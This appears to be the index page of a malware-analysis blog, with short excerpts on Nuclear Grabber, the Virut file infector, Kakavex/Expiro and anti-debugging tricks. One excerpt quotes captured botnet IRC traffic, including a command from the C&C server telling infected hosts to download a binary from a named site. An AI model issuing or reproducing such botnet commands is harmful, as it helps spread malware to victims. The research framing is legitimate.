You might have heard of a malware called Nuclear Grabber before. It’s a nasty trojan, written by a russian malware writer called Corpse, that’s designed to be a flexible data stealing platform. Nuclear Grabber is sold on a russian site for a hefty price, and each sold version is unique and private. (more…)
I was digging through my stash for something interesting when I spotted a small file, only 2048 bytes in size. When looking at the strings, besides some few imports like LoadLibraryA, it contained only two strings:
Hello World!
HI THERE
There were also some garbage strings there that looked like being encrypted with xor.
The guys running the Virut botnet are dealing out new malware again. The new file being downloaded is about 30k in size, and it’s packed with UPX. The some kind of obscuring layer on top of UPX, but it’s pretty trivial to bypass. (more…)
The gang behind the file infecting virus tagged as Virut are commanding more malware to be downloaded:
 (more…)
and something obese? A while back I received a sample on a file infecting virus. AV detection is quite scarce, with Symantec detecting it as W32.kakavex, PrevX detecting it as Covert.Sys.Exec and few others detecting it as W32.Expiro. Kakavex is quite an obese compared to its brethen like Virut; it adds about 110kb to the host file’s size!
It’s quite common to run into malicious programs (malware) that deploy various methods to detect debuggers. It’s good to be aware what can be thrown on your face when you’re analyzing or unpacking a malware. I’ll list a few here, and some ways to circumvent them.
I decided to poke around Virut a bit more. I followed the IRC trail, and spotted the following:
USER u394876 . . :_
NICK ssajvgia
JOIN &virtu
:ssajvgia!~u394876@xxx.xxx.xx.xxx JOIN :&virtu
:* PRIVMSG ssajvgia :!get http://www.ircer.pl:XX/XX.gif
So, what we have here is the C&C server at proxima.ircgalaxy.pl commanding the new infectees to download a binary from www.ircer.pl
Virut is a weird freak amongst malware. It’s a file infecting virus with IRC capabilities. It doesn’t use exploits to spread, but rather relies on filesharing by infecting various .exe and .scr files. (more…)